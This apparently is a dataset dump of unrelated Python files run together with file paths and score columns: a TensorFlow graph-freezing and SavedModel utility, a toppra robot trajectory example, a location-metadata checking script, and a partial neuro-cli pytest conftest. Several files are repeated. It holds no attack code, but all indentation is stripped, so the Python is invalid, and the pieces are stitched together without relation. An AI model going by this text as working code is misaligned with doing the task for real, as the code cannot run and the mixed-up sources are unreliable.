frozen_path = os.path.join(frozen_dir, 'frozen_graph-v%09d.pb' % version_id)
# Making sure frozen directory exists
if not os.path.exists(frozen_dir):
os.makedirs(frozen_dir, exist_ok=True)
# Creating a checkpoint
if history_saver is not None:
with graph.as_default():
history_saver.save(session, checkpoint_path)
# Freezing graph
convert_ckpt_to_frozen_graph(checkpoint_path=None,
frozen_graph_path=frozen_path,
graph=graph,
session=session)
def build_saved_model(saved_model_dir, version_id, signature, proto_fields, graph, session, history_saver=None):
""" Builds a SavedModel and a checkpoint from the graph
:param saved_model_dir: The path where to save the checkpoint and SavedModel
:param version_id: Integer. The version_id of the SavedModel to save.
:param signature: The output of adapter.get_signature() - signature of all the possible calls
:param proto_fields: A dictionary of features name with their proto field description
:param graph: The graph object to save
:param session: The session associated with the graph
:param history_saver: Optional. The saver to use to save historical checkpoints, otherwise no checkpoints will
be created and the graph will only be converted to SavedModel.
:return: Nothing
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
checkpoint_path = os.path.join(saved_model_dir, 'checkpoint-v%09d' % version_id)
saved_model_path = os.path.join(saved_model_dir, '%09d' % version_id)
# Making sure saved model directory exists
if not os.path.exists(saved_model_dir):
os.makedirs(saved_model_dir, exist_ok=True)
# Creating a checkpoint
if history_saver is not None:
with graph.as_default():
history_saver.save(session, checkpoint_path)
# Building saved model
convert_ckpt_to_saved_model(checkpoint_path=None,
saved_model_path=saved_model_path,
signature=signature,
proto_fields=proto_fields,
graph=graph,
session=session)
def convert_ckpt_to_frozen_graph(checkpoint_path, frozen_graph_path, meta_graph_path=None, graph=None, session=None):
""" Converts a checkpoint to a frozen (meta) graph with fixed weights for faster inference
:param checkpoint_path: The path to the checkpoint file (can be a directly, or a checkpoint file)
:param frozen_graph_path: The path where to saved the frozen_graph_path
:param meta_graph_path: Optional. The path of the meta_graph. Will be detected automatically if not provided.
:param graph: The graph object were to load the model. A new graph will be created if not provided.
:param session: The session object to use to load the model. A new session will be created if not provided.
:return: The graph and the session object used to load the checkpoint.
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
from diplomacy_research.utils.tensorflow import tf, graph_util, variables
# Loading the checkpoint from disk
if graph is None or session is None:
graph, session = load_graph_from_ckpt(checkpoint_path,
meta_graph_path=meta_graph_path,
graph=graph,
session=session)
# Converting graph to constant
input_graph_def = graph.as_graph_def()
output_keys = [k for k in graph.get_all_collection_keys() if ('variable' not in k.lower()
and '_step' not in k
and '_op' not in k
and '_context' not in k
and not k.startswith('_')
and not k.endswith('_ta')
and 'summaries' not in k
and 'is_trainable' not in k)]
# Making sure we are saving an iterator, otherwise the model will not be usable
if not [key for key in output_keys if 'iterator_resource' in key]:
LOGGER.error('Trying to freeze a model without an "iterator_resource" key. Model will not be usable. Aborting')
raise RuntimeError('Missing "iterator_resource" to freeze model.')
# Finding output nodes and extra tags
extra_tags = {}
output_nodes = []
for key in output_keys:
nodes_in_collection = graph.get_collection(key)
for node in nodes_in_collection:
if isinstance(node, variables.PartitionedVariable):
output_nodes += [var.name for var in node._get_variable_list()] # pylint: disable=protected-access
elif hasattr(node, 'name'):
output_nodes += [node.name]
else:
extra_tags.setdefault(key, [])
extra_tags[key] += [node]
# Freezing graph
output_graph_def = graph_util.convert_variables_to_constants(session,
input_graph_def,
[node.split(':')[0] for node in output_nodes])
# Storing date/time, original filename, and launch args
created_date = datetime.fromtimestamp(time.time(), timezone('America/Montreal'))
extra_tags['tag/created_date'] = [created_date.strftime("%Y-%m-%d %H:%M:%S %Z")]
extra_tags['tag/filename'] = [frozen_graph_path.split('/')[-1]]
extra_tags['tag/launch_cmd'] = [' '.join(sys.argv)]
# Importing in a new graph
output_graph = tf.Graph()
with output_graph.as_default():
tf.import_graph_def(output_graph_def)
# Transferring collections
collection_keys = graph.get_all_collection_keys()
for key in collection_keys:
if 'variable' in key.lower() or '_op' in key:
continue
nodes = graph.get_collection(key)
for node in nodes:
if hasattr(node, 'name'):
try:
tensor_name = 'import/{}{}'.format(node.name, ':0' if ':' not in node.name else '')
tensor_node = output_graph.get_tensor_by_name(tensor_name)
output_graph.add_to_collection(key, tensor_node)
except KeyError:
pass
# Adding extra tags
for key in extra_tags:
for value in extra_tags[key]:
output_graph.add_to_collection(key, value)
# Saving the frozen graph to disk
with output_graph.as_default():
tf.train.export_meta_graph(frozen_graph_path,
graph_def=output_graph.as_graph_def(),
clear_devices=True)
# Returning
return graph, session
def convert_ckpt_to_saved_model(checkpoint_path, saved_model_path, signature, proto_fields, meta_graph_path=None,
graph=None, session=None):
""" Converts a checkpoint to a SavedModel with fixed weights for faster inference
:param checkpoint_path: The path to the checkpoint file (can be a directly, or a checkpoint file)
:param saved_model_path: The path where to saved the SavedModel
:param signature: The output of adapter.get_signature() - signature of all the possible calls
:param proto_fields: A dictionary of features name with their proto field description
:param meta_graph_path: Optional. The path of the meta_graph. Will be detected automatically if not provided.
:param graph: The graph object were to load the model. A new graph will be created if not provided.
:param session: The session object to use to load the model. A new session will be created if not provided.
:return: The graph and the session object used to load the checkpoint.
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
from diplomacy_research.utils.tensorflow import tf, graph_util, build_tensor_info, saved_model_builder, \
signature_def_utils, tag_constants, variables, PREDICT_METHOD_NAME
# Loading the checkpoint from disk
if graph is None or session is None:
graph, session = load_graph_from_ckpt(checkpoint_path,
meta_graph_path=meta_graph_path,
graph=graph,
session=session)
# Converting graph to constant
input_graph_def = graph.as_graph_def()
output_keys = [k for k in graph.get_all_collection_keys() if ('variable' not in k.lower()
and '_step' not in k
and '_op' not in k
and '_context' not in k
and not k.startswith('_')
and not k.endswith('_ta')
and 'summaries' not in k
and 'is_trainable' not in k)]
# Finding output nodes and extra tags
extra_tags = {}
output_nodes = []
for key in output_keys:
nodes_in_collection = graph.get_collection(key)
for node in nodes_in_collection:
if isinstance(node, variables.PartitionedVariable):
output_nodes += [var.name for var in node._get_variable_list()] # pylint: disable=protected-access
elif hasattr(node, 'name'):
output_nodes += [node.name]
else:
extra_tags.setdefault(key, [])
extra_tags[key] += [node]
# Converting graph to constant
output_graph_def = graph_util.convert_variables_to_constants(session,
input_graph_def,
[node.split(':')[0] for node in output_nodes])
# Storing date/time, original filename, and launch args
created_date = datetime.fromtimestamp(time.time(), timezone('America/Montreal'))
extra_tags['tag/created_date'] = [created_date.strftime("%Y-%m-%d %H:%M:%S %Z")]
extra_tags['tag/filename'] = [saved_model_path.split('/')[-1]]
extra_tags['tag/launch_cmd'] = [' '.join(sys.argv)]
# Importing in a new graph
output_graph = tf.Graph()
with output_graph.as_default():
tf.import_graph_def(output_graph_def)
# Finding placeholders, features, and outputs
features, placeholders, outputs = {}, {}, {}
collection_keys = graph.get_all_collection_keys()
for key in collection_keys:
node = graph.get_collection(key)
if isinstance(node, list) and node: # If list, getting first element
node = node[0]
if key.startswith('feature'):
features[key.replace('feature_', '')] = output_graph.get_tensor_by_name('import/' + node.name)
elif key.startswith('placeholder'):
placeholders[key.replace('placeholder_', '')] = output_graph.get_tensor_by_name('import/' + node.name)
elif hasattr(node, 'name'):
try:
outputs[key] = output_graph.get_tensor_by_name('import/' + node.name)
except (KeyError, ValueError):
continue
# Adding extra tags
for key in extra_tags:
for value in extra_tags[key]:
output_graph.add_to_collection(key, value)
# Converting sparse fields
proto_fields = BaseBuilder.parse_sparse_fields(proto_fields)
# Building signature
signature_def = {}
for method_name in signature:
method_placeholders = signature.get(method_name).get('placeholders', {})
method_outputs = signature.get(method_name).get('outputs', [])
# Skipping method if we are missing some outputs
missing_outputs = [output_name for output_name in method_outputs if output_name not in outputs]
if missing_outputs:
LOGGER.warning('Unable to build method %s using the provided signature.', method_name)
continue
signature_inputs = {feature_name: build_tensor_info(features[feature_name]) for feature_name in features
if feature_name in proto_fields}
for ph_name in method_placeholders:
signature_inputs[ph_name] = build_tensor_info(placeholders[ph_name])
signature_outputs = {'%03d_%s' % (output_id, output_name): build_tensor_info(outputs[output_name])
for output_id, output_name in enumerate(method_outputs)}
signature_def[method_name] = signature_def_utils.build_signature_def(inputs=signature_inputs,
outputs=signature_outputs,
method_name=PREDICT_METHOD_NAME)
# Saving to disk
with output_graph.as_default():
temp_model_path = '/'.join(saved_model_path.split('/')[:-1] + ['__%s__' % saved_model_path.split('/')[-1]])
# Deleting from disk to avoid 'Directory already exists'
shutil.rmtree(saved_model_path, ignore_errors=True)
shutil.rmtree(temp_model_path, ignore_errors=True)
# Saving to a temporary path, to make sure the serving does not try to load the version before it is ready
builder = saved_model_builder.SavedModelBuilder(temp_model_path)
builder.add_meta_graph_and_variables(session,
[tag_constants.SERVING],
signature_def_map=signature_def,
clear_devices=True)
builder.save()
# Renaming to the correct path
shutil.move(temp_model_path, saved_model_path)
# Returning
return graph, session
def load_frozen_graph(frozen_graph_path, graph=None, session=None):
""" Loads a frozen graph from disk
:param frozen_graph_path: The path where the frozen graph is located
:param graph: The graph object were to load the model. A new graph will be created if not provided.
:param session: The session object to use to load the model. A new session will be created if not provided.
:return: The graph and the session object used to load the frozen graph.
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
from diplomacy_research.utils.tensorflow import tf, tf_logging
# Making sure the path exists
if not os.path.exists(frozen_graph_path):
LOGGER.error('The frozen graph %s does not exist.', frozen_graph_path)
raise FileNotFoundError()
# Load the frozen (meta) graph into a TF graph
graph = tf.Graph() if graph is None else graph
with graph.as_default():
session = tf.Session(graph=graph) if session is None else session
# Not showing "Saver not created because there are no variables in the graph to restore" messages
tf_logging.set_verbosity('ERROR')
tf.train.import_meta_graph(frozen_graph_path, clear_devices=True)
tf_logging.set_verbosity('INFO')
return graph, session
def get_constructors_from_frozen_graph(model_path):
""" Finds the BaseDatasetBuilder and the PolicyAdapter from a frozen checkpoint from disk
:param model_path: The path to the frozen checkpoint
:return: The BaseDatasetBuilder and the PolicyAdapter object linked to this model, otherwise (None, None)
"""
base_dir = None
model_name = None
# Making sure model exists
if not os.path.exists(model_path):
LOGGER.info('Unable to find model at %s', model_path)
return None, None
# Loading graph
graph, _ = load_frozen_graph(model_path)
# Detecting model type
tags = sorted([key for key in graph.get_all_collection_keys() if 'tag/' in key])
for tag_name in tags:
if 'tag' in tag_name:
for search_key in MODEL_PATHS:
if search_key in tag_name:
base_dir = MODEL_PATHS[search_key]
model_name = tag_name
# No base dir found
if base_dir is None or model_name is None:
LOGGER.info('Unable to detect the model used to generate this file.')
return None, None
# Loading the base dataset builder, and the policy adapter
base_dataset_builder = locate('%s.BaseDatasetBuilder' % base_dir.replace('/', '.'))
policy_adapter = locate('%s.PolicyAdapter' % base_dir.replace('/', '.'))
# Returning
return base_dataset_builder, policy_adapter | 0.720172 | 0.175432 |
import toppra as ta
import toppra.constraint as constraint
import toppra.algorithm as algo
import numpy as np
import matplotlib.pyplot as plt
import argparse
def main():
parser = argparse.ArgumentParser(description="An example showcasing the usage of robust constraints."
"A velocity constraint and a robust acceleration constraint"
"are considered in this script.")
parser.add_argument("-N", "--N", type=int, help="Number of segments in the discretization.", default=100)
parser.add_argument("-v", "--verbose", action="store_true", default=False)
parser.add_argument("-du", "--du", default=1e-3, type=float)
parser.add_argument("-dx", "--dx", default=5e-2, type=float)
parser.add_argument("-dc", "--dc", default=9e-3, type=float)
parser.add_argument("-so", "--solver_wrapper", default='ecos')
parser.add_argument("-i", "--interpolation_scheme", default=1, type=int)
args = parser.parse_args()
if args.verbose:
ta.setup_logging("DEBUG")
else:
ta.setup_logging("INFO")
# Parameters
N_samples = 5
dof = 7
# Random waypoints used to obtain a random geometric path.
np.random.seed(9)
way_pts = np.random.randn(N_samples, dof)
# Create velocity bounds, then velocity constraint object
vlim_ = np.random.rand(dof) * 20
vlim = np.vstack((-vlim_, vlim_)).T
# Create acceleration bounds, then acceleration constraint object
alim_ = np.random.rand(dof) * 2
alim = np.vstack((-alim_, alim_)).T
path = ta.SplineInterpolator(np.linspace(0, 1, 5), way_pts)
pc_vel = constraint.JointVelocityConstraint(vlim)
pc_acc = constraint.JointAccelerationConstraint(
alim, discretization_scheme=constraint.DiscretizationType.Interpolation)
robust_pc_acc = constraint.RobustLinearConstraint(
pc_acc, [args.du, args.dx, args.dc], args.interpolation_scheme)
instance = algo.TOPPRA([pc_vel, robust_pc_acc], path,
gridpoints=np.linspace(0, 1, args.N + 1),
solver_wrapper=args.solver_wrapper)
X = instance.compute_feasible_sets()
K = instance.compute_controllable_sets(0, 0)
_, sd_vec, _ = instance.compute_parameterization(0, 0)
X = np.sqrt(X)
K = np.sqrt(K)
plt.plot(X[:, 0], c='green', label="Feasible sets")
plt.plot(X[:, 1], c='green')
plt.plot(K[:, 0], '--', c='red', label="Controllable sets")
plt.plot(K[:, 1], '--', c='red')
plt.plot(sd_vec, label="Velocity profile")
plt.legend()
plt.title("Path-position path-velocity plot")
plt.show()
jnt_traj, aux_traj = instance.compute_trajectory(0, 0)
ts_sample = np.linspace(0, jnt_traj.duration, 100)
qs_sample = jnt_traj.evaldd(ts_sample)
plt.plot(ts_sample, qs_sample)
plt.show()
if __name__ == '__main__':
main() | examples/robust_kinematics.py | import toppra as ta
import toppra.constraint as constraint
import toppra.algorithm as algo
import numpy as np
import matplotlib.pyplot as plt
import argparse
def main():
parser = argparse.ArgumentParser(description="An example showcasing the usage of robust constraints."
"A velocity constraint and a robust acceleration constraint"
"are considered in this script.")
parser.add_argument("-N", "--N", type=int, help="Number of segments in the discretization.", default=100)
parser.add_argument("-v", "--verbose", action="store_true", default=False)
parser.add_argument("-du", "--du", default=1e-3, type=float)
parser.add_argument("-dx", "--dx", default=5e-2, type=float)
parser.add_argument("-dc", "--dc", default=9e-3, type=float)
parser.add_argument("-so", "--solver_wrapper", default='ecos')
parser.add_argument("-i", "--interpolation_scheme", default=1, type=int)
args = parser.parse_args()
if args.verbose:
ta.setup_logging("DEBUG")
else:
ta.setup_logging("INFO")
# Parameters
N_samples = 5
dof = 7
# Random waypoints used to obtain a random geometric path.
np.random.seed(9)
way_pts = np.random.randn(N_samples, dof)
# Create velocity bounds, then velocity constraint object
vlim_ = np.random.rand(dof) * 20
vlim = np.vstack((-vlim_, vlim_)).T
# Create acceleration bounds, then acceleration constraint object
alim_ = np.random.rand(dof) * 2
alim = np.vstack((-alim_, alim_)).T
path = ta.SplineInterpolator(np.linspace(0, 1, 5), way_pts)
pc_vel = constraint.JointVelocityConstraint(vlim)
pc_acc = constraint.JointAccelerationConstraint(
alim, discretization_scheme=constraint.DiscretizationType.Interpolation)
robust_pc_acc = constraint.RobustLinearConstraint(
pc_acc, [args.du, args.dx, args.dc], args.interpolation_scheme)
instance = algo.TOPPRA([pc_vel, robust_pc_acc], path,
gridpoints=np.linspace(0, 1, args.N + 1),
solver_wrapper=args.solver_wrapper)
X = instance.compute_feasible_sets()
K = instance.compute_controllable_sets(0, 0)
_, sd_vec, _ = instance.compute_parameterization(0, 0)
X = np.sqrt(X)
K = np.sqrt(K)
plt.plot(X[:, 0], c='green', label="Feasible sets")
plt.plot(X[:, 1], c='green')
plt.plot(K[:, 0], '--', c='red', label="Controllable sets")
plt.plot(K[:, 1], '--', c='red')
plt.plot(sd_vec, label="Velocity profile")
plt.legend()
plt.title("Path-position path-velocity plot")
plt.show()
jnt_traj, aux_traj = instance.compute_trajectory(0, 0)
ts_sample = np.linspace(0, jnt_traj.duration, 100)
qs_sample = jnt_traj.evaldd(ts_sample)
plt.plot(ts_sample, qs_sample)
plt.show()
if __name__ == '__main__':
main() | 0.738198 | 0.423995 |
import argparse
import pandas as pd
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Check for missing colors & locations",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--metadata', type=str, nargs='+', required=True, help="input region adjusted metadata")
parser.add_argument('--colors', type=str, nargs='+', required=True, help="input region specific color file")
parser.add_argument('--latlong', type=str, required=True, help="input lat-long file")
args = parser.parse_args()
things_to_exclude_orig = ['Africa', 'Asia', 'South America', 'Europe',
'North America', 'Oceania', 'Grand princess cruise ship',
'diamond princess']
things_to_exclude = [x.lower() for x in things_to_exclude_orig]
all_metadatas = [pd.read_csv(met, delimiter='\t') for met in args.metadata]
metadata = pd.concat(all_metadatas, sort=False)
all_colors = [pd.read_csv(col, delimiter='\t', header=None) for col in args.colors]
colors = pd.concat(all_colors, sort=False)
latlong = pd.read_csv(args.latlong, delimiter='\t', header=None)
for geo_value in ['location', 'division', 'country']:
locs_w_color_orig = colors.loc[colors[0]==geo_value,1].values
locs_w_color = [x.lower() for x in locs_w_color_orig]
locs_w_latlong_orig = latlong.loc[latlong[0]==geo_value,1].values
locs_w_latlong = [x.lower() for x in locs_w_latlong_orig]
locs_in_meta_orig = [x for x in metadata[geo_value].unique() if not pd.isna(x)]
locs_in_meta = [x.lower() for x in locs_in_meta_orig]
missing_color_locs = [loc for loc in locs_in_meta if loc not in locs_w_color and loc not in things_to_exclude]
if missing_color_locs:
print("The following {} are missing colors:".format(geo_value))
print(missing_color_locs)
print("\n")
if geo_value != 'country':
missing_latlong_locs = [loc for loc in locs_in_meta if loc not in locs_w_latlong and loc not in things_to_exclude]
if missing_latlong_locs:
print("The following {} are missing lat-long values:".format(geo_value))
print(missing_latlong_locs)
print("\n")
print("Please remember this does *not* check lat-longs for countries!!") | scripts/check_missing_locations.py | import argparse
import pandas as pd
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Check for missing colors & locations",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--metadata', type=str, nargs='+', required=True, help="input region adjusted metadata")
parser.add_argument('--colors', type=str, nargs='+', required=True, help="input region specific color file")
parser.add_argument('--latlong', type=str, required=True, help="input lat-long file")
args = parser.parse_args()
things_to_exclude_orig = ['Africa', 'Asia', 'South America', 'Europe',
'North America', 'Oceania', 'Grand princess cruise ship',
'diamond princess']
things_to_exclude = [x.lower() for x in things_to_exclude_orig]
all_metadatas = [pd.read_csv(met, delimiter='\t') for met in args.metadata]
metadata = pd.concat(all_metadatas, sort=False)
all_colors = [pd.read_csv(col, delimiter='\t', header=None) for col in args.colors]
colors = pd.concat(all_colors, sort=False)
latlong = pd.read_csv(args.latlong, delimiter='\t', header=None)
for geo_value in ['location', 'division', 'country']:
locs_w_color_orig = colors.loc[colors[0]==geo_value,1].values
locs_w_color = [x.lower() for x in locs_w_color_orig]
locs_w_latlong_orig = latlong.loc[latlong[0]==geo_value,1].values
locs_w_latlong = [x.lower() for x in locs_w_latlong_orig]
locs_in_meta_orig = [x for x in metadata[geo_value].unique() if not pd.isna(x)]
locs_in_meta = [x.lower() for x in locs_in_meta_orig]
missing_color_locs = [loc for loc in locs_in_meta if loc not in locs_w_color and loc not in things_to_exclude]
if missing_color_locs:
print("The following {} are missing colors:".format(geo_value))
print(missing_color_locs)
print("\n")
if geo_value != 'country':
missing_latlong_locs = [loc for loc in locs_in_meta if loc not in locs_w_latlong and loc not in things_to_exclude]
if missing_latlong_locs:
print("The following {} are missing lat-long values:".format(geo_value))
print(missing_latlong_locs)
print("\n")
print("Please remember this does *not* check lat-longs for countries!!") | 0.300951 | 0.21162 |
import dataclasses
import io
import logging
from collections import namedtuple
from decimal import Decimal
from difflib import ndiff
from pathlib import Path
from typing import Any, Callable, DefaultDict, Iterator, List, Optional, Set, Union
import click
import pytest
from rich.console import Console, RenderableType
from yarl import URL
from neuro_sdk import Cluster, Factory, Preset
from neuro_sdk._config import _AuthConfig, _AuthToken, _ConfigData
from neuro_cli import __version__
from neuro_cli.const import EX_OK
from neuro_cli.main import main
from neuro_cli.root import Root
from neuro_cli.utils import Command, Context
SysCapWithCode = namedtuple("SysCapWithCode", ["out", "err", "code"])
log = logging.getLogger(__name__)
@pytest.fixture()
def nmrc_path(tmp_path: Path, token: str, auth_config: _AuthConfig) -> Path:
nmrc_path = tmp_path / "conftest.nmrc"
cluster_config = Cluster(
registry_url=URL("https://registry-dev.neu.ro"),
storage_url=URL("https://storage-dev.neu.ro"),
users_url=URL("https://users-dev.neu.ro"),
monitoring_url=URL("https://monitoring-dev.neu.ro"),
secrets_url=URL("https://secrets-dev.neu.ro"),
disks_url=URL("https://disks-dev.neu.ro"),
buckets_url=URL("https://buckets-dev.neu.ro"),
presets={
"gpu-small": Preset(
credits_per_hour=Decimal("10"),
cpu=7,
memory_mb=30 * 1024,
gpu=1,
gpu_model="nvidia-tesla-k80",
),
"gpu-large": Preset(
credits_per_hour=Decimal("10"),
cpu=7,
memory_mb=60 * 1024,
gpu=1,
gpu_model="nvidia-tesla-v100",
),
"cpu-small": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=2 * 1024
),
"cpu-large": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=14 * 1024
),
},
name="default",
orgs=[None],
)
cluster2_config = Cluster(
registry_url=URL("https://registry2-dev.neu.ro"),
storage_url=URL("https://storage2-dev.neu.ro"),
users_url=URL("https://users2-dev.neu.ro"),
monitoring_url=URL("https://monitoring2-dev.neu.ro"),
secrets_url=URL("https://secrets2-dev.neu.ro"),
disks_url=URL("https://disks2-dev.neu.ro"),
buckets_url=URL("https://buckets2-dev.neu.ro"),
presets={
"cpu-small": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=2 * 1024
),
},
name="other",
orgs=[None],
)
config = _ConfigData(
auth_config=auth_config,
auth_token=_AuthToken.create_non_expiring(token),
url=URL("https://dev.neu.ro/api/v1"),
admin_url=URL("https://dev.neu.ro/apis/admin/v1"),
version=__version__,
cluster_name=cluster_config.name,
org_name=cluster_config.orgs[0],
clusters={
cluster_config.name: cluster_config,
cluster2_config.name: cluster2_config,
},
)
Factory(nmrc_path)._save(config)
return nmrc_path
def create_root(config_path: Path) -> Root:
async def cmd() -> None:
pass
return Root(
color=False,
tty=False,
disable_pypi_version_check=True,
network_timeout=60,
config_path=config_path,
verbosity=0,
trace=False,
trace_hide_token=True,
force_trace_all=False,
command_path="",
command_params=[],
skip_gmp_stats=True,
show_traceback=False,
iso_datetime_format=False,
ctx=Context(Command(cmd, name="")),
)
@pytest.fixture()
def root(nmrc_path: Path) -> Iterator[Root]:
root = create_root(config_path=nmrc_path)
root.run(root.init_client())
yield root
root.close()
@pytest.fixture()
def root_no_logged_in(tmp_path: Path) -> Iterator[Root]:
root = create_root(config_path=tmp_path)
assert root._client is None
yield root
assert root._client is None
root.close()
@pytest.fixture()
def run_cli(
nmrc_path: Path, capfd: Any, tmp_path: Path
) -> Callable[[List[str]], SysCapWithCode]:
def _run_cli(arguments: List[str]) -> SysCapWithCode:
log.info("Run 'neuro %s'", " ".join(arguments))
capfd.readouterr()
code = EX_OK
try:
default_args = [
"--show-traceback",
"--disable-pypi-version-check",
"--color=no",
]
if "--neuromation-config" not in arguments:
for arg in arguments:
if arg.startswith("--neuromation-config="):
break
else:
default_args.append(f"--neuromation-config={nmrc_path}")
main(default_args + arguments)
except SystemExit as e:
code = e.code
pass
out, err = capfd.readouterr()
return SysCapWithCode(out.strip(), err.strip(), code)
return _run_cli
@pytest.fixture()
def click_tty_emulation(monkeypatch: Any) -> None:
monkeypatch.setattr("click._compat.isatty", lambda stream: True)
@dataclasses.dataclass(eq=False)
class Guard:
arg: str
path: Path
def __eq__(self, other: object) -> bool:
if not isinstance(other, Guard):
return NotImplemented
return [s.rstrip() for s in self.arg.splitlines()] == [
s.rstrip() for s in other.arg.splitlines()
]
class RichComparator:
def __init__(self, config: Any) -> None:
self._regen = config.getoption("--rich-gen")
self._config = config
self._reporter = config.pluginmanager.getplugin("terminalreporter")
assert self._reporter is not None
self._cwd = Path.cwd()
self._written_refs: List[Path] = []
self._checked_refs: Set[Path] = set()
self._file_pos = DefaultDict[io.StringIO, int](int)
def mkref(self, request: Any, index: Optional[int]) -> Path:
folder = Path(request.fspath).parent
basename = request.function.__qualname__
if hasattr(request.node, "callspec"):
parametrize_id = request.node.callspec.id
# Some characters are forbidden in FS path (on Windows)
bad_to_good = {
"/": "#forward_slash#",
"\\": "#back_slash#",
"<": "#less#",
">": "#more#",
":": "#colon#",
'"': "#double_qoute#",
"|": "#vertical_bar#",
"?": "#question_mark#",
"*": "#star#",
}
for bad, good in bad_to_good.items():
parametrize_id = parametrize_id.replace(bad, good)
# On windows, some characters are forbidden
basename += f"[{parametrize_id}]"
if index is not None:
basename += "_" + str(index)
basename += ".ref"
return folder / "ascii" / basename
def rel(self, ref: Path) -> Path:
return ref.relative_to(self._cwd)
def check_io(self, ref: Path, file: io.StringIO) -> None:
__tracebackhide__ = True
tmp = file.getvalue()
buf = tmp[self._file_pos[file] :]
self._file_pos[file] = len(tmp)
self.check(ref, buf)
def check(self, ref: Path, buf: str) -> None:
__tracebackhide__ = True
if ref in self._checked_refs:
pytest.fail(
f"{self.rel(ref)} is already checked. "
"Hint: use index when generating refs automatically"
)
else:
self._checked_refs.add(ref)
buf = buf.strip()
buf = click.unstyle(buf)
if self._regen:
self.write_ref(ref, buf)
else:
orig = self.read_ref(ref)
tmp = ref.with_suffix(".orig")
self.write_file(tmp, buf)
# reading from file is important, file writer replaces \r with \n
actual = self.read_file(tmp)
assert Guard(actual, tmp) == Guard(orig, ref)
def read_file(self, ref: Path) -> str:
return ref.read_text(encoding="utf8").strip()
def read_ref(self, ref: Path) -> str:
__tracebackhide__ = True
if not ref.exists():
rel_ref = self.rel(ref)
pytest.fail(
f"The reference {rel_ref} doesn't exist.\n"
"Create it yourself or run pytest with '--rich-gen' option."
)
else:
return self.read_file(ref)
def write_file(self, ref: Path, buf: str) -> None:
ref.parent.mkdir(parents=True, exist_ok=True)
ref.write_text(buf.strip() + "\n", encoding="utf8")
def write_ref(self, ref: Path, buf: str) -> bool:
if ref.exists():
orig = ref.read_text().strip()
if orig == buf:
return False
self.write_file(ref, buf)
if self._reporter.verbosity > 0:
rel_ref = self.rel(ref)
self._reporter.write_line(f"Regenerate {rel_ref}", yellow=True)
self._written_refs.append(ref)
return True
def summary(self) -> None:
if self._reporter.verbosity == 0:
if self._written_refs:
self._reporter.write_line("Regenerated files:", yellow=True)
for fname in self._written_refs:
rel_ref = self.rel(fname)
self._reporter.write_line(f" {rel_ref}", yellow=True)
def diff(self, lft: Guard, rgt: Guard) -> List[str]:
# The same as _diff_text from
# pytest/assertion/util.py#L200-L245
# plus a few extra lines with additional instructions.
explanation: List[str] = []
left = lft.arg
right = rgt.arg
if self._reporter.verbosity < 1:
i = 0 # just in case left or right has zero length
for i in range(min(len(left), len(right))):
if left[i] != right[i]:
break
if i > 42:
i -= 10 # Provide some context
explanation = [
"Skipping %s identical leading characters in diff, use -v to show"
% i
]
left = left[i:]
right = right[i:]
if len(left) == len(right):
for i in range(len(left)):
if left[-i] != right[-i]:
break
if i > 42:
i -= 10 # Provide some context
explanation += [
"Skipping {} identical trailing "
"characters in diff, use -v to show".format(i)
]
left = left[:-i]
right = right[:-i]
keepends = True
if left.isspace() or right.isspace():
left = repr(str(left))
right = repr(str(right))
explanation += [
"Strings contain only whitespace, escaping them using repr()"
]
# "right" is the expected base against which we compare "left",
# see https://github.com/pytest-dev/pytest/issues/3333
explanation += [
line.strip("\n")
for line in ndiff(right.splitlines(keepends), left.splitlines(keepends))
]
explanation.append("")
explanation.append(f"'cat {self.rel(lft.path)}' to see the test output.")
explanation.append(f"'cat {self.rel(rgt.path)}' to see the reference.")
explanation.append(
f"Use 'pytest ... --rich-gen' to regenerate reference files "
"from values calculated by tests"
)
return explanation
def pytest_assertrepr_compare(
config: Any, op: str, left: object, right: object
) -> Optional[List[str]]:
if isinstance(left, Guard) and isinstance(right, Guard):
plugin = config.pluginmanager.getplugin("rich-comparator")
return plugin.diff(left, right)
return None
# run after terminalreporter/capturemanager are configured
@pytest.hookimpl(trylast=True)
def pytest_configure(config: Any) -> None:
comparator = RichComparator(config)
config.pluginmanager.register(comparator, "rich-comparator")
def pytest_terminal_summary(terminalreporter: Any) -> None:
config = terminalreporter.config
comparator = config.pluginmanager.getplugin("rich-comparator")
comparator.summary()
@pytest.fixture
def rich_cmp(request: Any) -> Callable[..., None]:
def comparator(
src: Union[RenderableType, Console],
ref: Optional[Path] = None,
*,
color: bool = True,
tty: bool = True,
index: Optional[int] = 0,
) -> None:
__tracebackhide__ = True
plugin = request.config.pluginmanager.getplugin("rich-comparator")
if ref is None:
ref = plugin.mkref(request, index)
if isinstance(src, io.StringIO):
plugin.check_io(ref, src)
elif isinstance(src, Console):
if isinstance(src.file, io.StringIO):
plugin.check_io(ref, src.file)
else:
buf = src.export_text(clear=True, styles=True)
plugin.check(ref, buf)
else:
file = io.StringIO()
console = Console(
file=file,
width=160,
height=24,
force_terminal=tty,
color_system="auto" if color else None,
record=True,
highlighter=None,
legacy_windows=False,
)
console.print(src)
plugin.check_io(ref, file)
return comparator
NewConsole = Callable[..., Console]
@pytest.fixture
def new_console() -> NewConsole:
def factory(*, tty: bool, color: bool = True) -> Console:
file = io.StringIO()
# console doesn't accept the time source,
# using the real time in tests is not reliable
return Console(
file=file,
width=160,
height=24,
force_terminal=tty,
color_system="auto" if color else None,
record=True,
highlighter=None,
legacy_windows=False,
log_path=False,
log_time=False,
)
return factory | neuro-cli/tests/unit/conftest.py | import dataclasses
import io
import logging
from collections import namedtuple
from decimal import Decimal
from difflib import ndiff
from pathlib import Path
from typing import Any, Callable, DefaultDict, Iterator, List, Optional, Set, Union
import click
import pytest
from rich.console import Console, RenderableType
from yarl import URL
from neuro_sdk import Cluster, Factory, Preset
from neuro_sdk._config import _AuthConfig, _AuthToken, _ConfigData
from neuro_cli import __version__
from neuro_cli.const import EX_OK
from neuro_cli.main import main
from neuro_cli.root import Root
from neuro_cli.utils import Command, Context
